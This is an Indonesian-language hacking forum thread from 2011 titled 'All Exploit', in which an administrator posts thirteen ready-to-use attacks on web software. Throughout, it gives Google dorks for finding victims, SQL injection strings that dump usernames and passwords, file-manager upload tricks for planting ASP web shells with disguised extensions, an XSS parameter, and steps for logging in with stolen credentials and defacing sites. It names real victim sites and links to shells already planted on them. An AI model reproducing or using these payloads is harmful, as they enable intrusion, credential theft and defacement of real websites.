All Exploit - Forum

[ New messages · Members · Forum rules · Search · RSS ]

Page 1 of 1
1

All Exploit (wanmadehope)

All Exploit

satria

Date: Friday, 2011-08-05, 8:30 AM | Message # 1

Lieutenant colonel

Group: Administrators

Messages: 126

Reputation: 0

Status: Offline

Exploit:
-----------------------------------------

1.Remote Exploit
========================================
...
dork : spaw2/dialogs/ dan spaw2/uploads/files/
========================================

kalo web dah ketemu pasang exploit
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

-----------------------------------------

-----------------------------------------
2.Remote File Upload Opencart

========================================
dork : Powered By OpenCart site:com

========================================
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

nanti ubah

Connector:

dari ASP
ubah jadi PHP

-----------------------------------------

-----------------------------------------
========================================

3.dork : com_joomradio
========================================

Exploit : /index.php?option=com_joomradio&page=show_radio&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user( ),user(),user(),user() FROM jos_users--
example : http://www.bces-india.com/index.p....%20user (),concat(username,0x3a,password),user(),user(%20),user(),user(),user()%20FROM%20jos_users-- Razz

-----------------------------------------

-----------------------------------------
========================================

4.inurl:/forums.asp?iFor= Lalu Paste Di google
========================================

Lalu Pilih Salah Satu Target Anda
Misal Nya http://www.portugalweb.net/forum/forums.asp?iFor=23

Hapus angka dibelakang =

Hingga menjadi ini

http://www.portugalweb.net/forum/forums.asp?iFor=

Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users

Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya

Cari username admin & passnya.

Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password

Username : admin
Password : default

Sekarang klik tulisan login yg berada diatas.

Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"

Isi Subject nya...
Contoh : HACKED BY BLA BLA BLA

lalu masukin script deface HTML nya ke kolom di bawah subject.
dan klik Post !!!

-----------------------------------------

satria

Date: Friday, 2011-08-05, 8:32 AM | Message # 2

Lieutenant colonel

Group: Administrators

Messages: 126

Reputation: 0

Status: Offline

5.upload shell di “sitefinity [asp.net]“

dork : “Sitefinity:Login”

siapin shel asp kamu dengan nama : shell.asp;.gif
exploit

http://[localhost]/sitefin....og.aspx

ex korban..
moga blom mokaq

http://www.unitedexperts.co.uk/sitefin....og.aspx

kalo udah pilih "select"
lalu "upload this image"

nah kalo udah siap uload..

liat di sebelah kanan atas
tulisan seperti berikut

"view original size"

nah shell nya bakaln kebuka..
demo

http://www.nsinursingsolutions.com/Images/cmd.asp;.gif

kalo g bisa upload html buat deface
kayak gini aja

http://[localhost]/Images/ho1onk.asp;.jpg

6.http://www.blog.linux-mania.net/archives/30 -->Joomla

7.dork :inurl:”default_Image.asp”

EXPLOITS:

http://[localhost]/imageLibrary/admin/images/default_Image.asp

ex:
http://www.access2asp.com/imageL....age.asp

shell nya :

http://www.access2asp.com/dotnetdemo/admin/images/cmd.asp;.gif

8.inurl : /portals/0/

exploit:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

trus pilih File ( A File On Your Site )

masukan code:
ganti url di browser dengan

javascript:__doPostBack('ctlURL$cmdUpload','')
terus

setelah itu browse shell anda
kemudian pilih

ex:http://solterra-connect.com//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

nie yg ada shell
http://solterra-connect.com/Portals/0/system.asp;.jpg

pass:sohai

9.inurl:/tiny_mce/plugins/filemanager/ intitle:"index of"

exploit:editor/filemanager/files/ho1onk/test.html

ex:http://tvkomarno.sk/

jadi:
http://tvkomarno.sk/editor/filemanager/default.htm

10.dorknya : inurl:"/wiki/run.php" powered By PWP

/wiki/run.php

11.XXS

inurl:/gen_confirm.php?errmsg=

hassil:http://www.balticsmarket.com/gen_confirm.php?errmsg=sohai was here<\cente-r><\h-1>

12.Exploit Zoopeer <-------http://hacker-newbie.org/showthread.php?tid=7523

dork : "Powered By Zoopeer"
Exploit :

fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector

ex:http://www.kaian.ir/
jadi

http://www.kaian.ir/....or.php

hasil:
http://www.kaian.ir/images/File/system.html

http://www.kaian.ir/images/File/Yukihina.html

13.Jumping ala sohai

http://fathaz.net/wp-content/themes/tomatoes/

All Exploit (wanmadehope)

Page 1 of 1
1